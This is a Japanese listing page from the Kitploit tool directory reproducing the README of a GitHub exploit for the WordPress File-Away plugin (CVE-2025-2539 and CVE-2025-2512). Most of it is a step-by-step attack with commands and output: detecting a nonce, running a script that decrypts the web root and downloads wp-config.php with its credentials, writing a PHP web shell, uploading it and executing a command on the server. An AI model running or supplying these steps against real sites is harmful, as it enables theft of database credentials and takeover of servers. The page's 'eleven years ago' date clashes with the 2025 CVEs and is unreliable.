Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
file-away-exploit — WordPress File-Awayプラグイン用のリモートコード実行エクスプロイトスクリプト (CVE-2025-2512 & CVE-2025-2539) | Kitploit
ツール/GitHubGitHub/whattheslime/file-away-exploit
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテストペイロード開発
GitHubwhattheslime/file-away-exploit

file-away-exploit

WordPress File-Awayプラグイン用のリモートコード実行エクスプロイトスクリプト (CVE-2025-2512 & CVE-2025-2539)

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

File-Away エクスプロイト (CVE-2025-2539 & CVE-2025-2512)

📌 目的

このリポジトリには、File-Away(ファイル管理に使用されるWordPressプラグイン)で発見された脆弱性の詳細とスクリプトが含まれています。

このプラグインには、リモートコード実行につながる2つの脆弱性が含まれています(File-Away 3.9.9.0.1 でテスト済み):

  • CVE-2025-2539: 認証なしの任意ファイル読み取り
  • CVE-2025-2512: 認証なしの任意ファイルアップロード

📖 認証なしの任意ファイル読み取り

WordPress用プラグインFile-Awayは、バージョン3.9.9.0.1までのすべてのバージョンにおいて、認証なしの任意ファイル読み取りに対して脆弱です。

この脆弱性は、次の2つの問題が原因で発生します。lib/cls/class.fileaway_stats.php:file_away_stats->ajax()関数における認証確認の欠如と、lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt()関数における脆弱な暗号アルゴリズムの使用です。

これにより、認証されていない攻撃者がWordPress設定ファイル(wp-config.php)を含む任意のファイルを読み取ることが可能になります。

📁 認証なしの任意ファイルアップロード

WordPress用プラグインFile-Awayは、バージョン3.9.9.0.1までのすべてのバージョンにおいて、認証なしの任意ファイルアップロードに対して脆弱です。

この脆弱性は、lib/cls/class.fileaway_management.php:fileaway_management->upload()関数における認証確認の欠如と不適切なファイルタイプ検証の2つの問題が原因で発生します。

これにより、認証されていない攻撃者が任意のファイルをアップロードし、コード実行につながる可能性があります。

🔍 検出

対象のWordPressインスタンスにFile-Awayプラグインがインストールされ有効化されている場合、fileaway_stats nonceがインデックスページに存在するはずです:

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 エクスプロイト手順

  1. python の依存関係をインストール:

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. 任意ファイル読み取りの脆弱性を使用して、WordPressインスタンスの設定ファイル(wp-config.php)を取得します:

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. アップロードするPHPファイルを作成:

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. 任意ファイルアップロードの脆弱性を使用して、サーバーにファイルをアップロード:

ツールをダウンロード
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ ファイルはデフォルトで wp-content ディレクトリにアップロードされます ⚠️

  • アップロードしたPHPファイルにアクセス:

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)